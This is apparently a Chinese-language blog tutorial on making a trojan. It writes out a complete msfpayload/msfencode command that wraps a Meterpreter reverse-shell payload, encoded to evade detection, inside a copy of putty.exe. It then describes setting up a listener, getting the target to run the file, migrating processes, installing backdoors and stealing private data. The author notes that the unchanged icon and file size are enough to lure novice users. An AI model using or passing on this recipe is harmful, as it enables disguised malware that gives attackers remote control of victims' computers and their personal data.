木马程序的制作

时间:2023-02-22 09:36:18

0x0:想必大家都听说过计算机病毒或者木马吧,看着电影里面的黑客敲几下键盘就能控制你的系统,窃取你的隐私资料,执行任意命令,很炫酷吧,其实这种技术不难实现,接下来我就带领大家来玩一玩木马的制作.

实验环境:Win7SP1+Backtrack5.

使用工具有:msfpayload+msfencode.

 

0x01使用msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.30.101  LPORT=443 R | msfencode -e x86/shikata_ga_nai  -c  5  -t  exe  -x  /root/Desktop/putty.exe  -o /root/Desktop/putty_backdoor.exe木马程序的制作

1-1.

命令解释:

Msfpayload后面是一个具有回连功能攻击载荷.

LHOST设置为自己的IPLPORT设置为自己的端口,用于回连.

RRaw)是输出为二进制格式,|代表管道,将二进制数据通过管道给msfencode进行编码.

e选择编码的模块,c表示编码的次数,这里是5.

t表示生成的格式,这里为exe.

x表示选择的源文件,o是输出加入PAYLOAD并进行过编码的木马文件.

 

0x02:生成的木马文件如图1-2.

木马程序的制作 

1-2.

0x03:进入MSF后,我们打开监听模块.

 木马程序的制作

1-3.

选择好PAYLOAD后设置目标回连的IP和端口即可.

 木马程序的制作

1-4.

0x04:把木马文件复制到目标机器上并执行.

 木马程序的制作

1-5.

0x05:查看监听状态,会发现有一个Meterpreter回连会话,这是你就可以使用migrate迁移进程,然后安装后门程序,再窃取隐私信息...

 木马程序的制作

1-6.

 

End:这次渗透测试还是很简单的,蛋疼的是看《Metasploit渗透测试魔鬼训练营》的木马程序制作时一直不成功,研究了几天后偶然在国外的技术文章中收获了点灵感————不使用-K参数,虽然生成的木马程序不能拥有源程序的完整功能,但图标和程序大小没有改变,足够诱惑小白用户了,虽然msfencode2015年就宣布停止了,但我还是想把这块硬骨头啃烂,如果各位同道能找到解决方法,请联系我,谢谢!

 木马程序的制作

1-7报错问题.

  

You can find me by qq:1762458611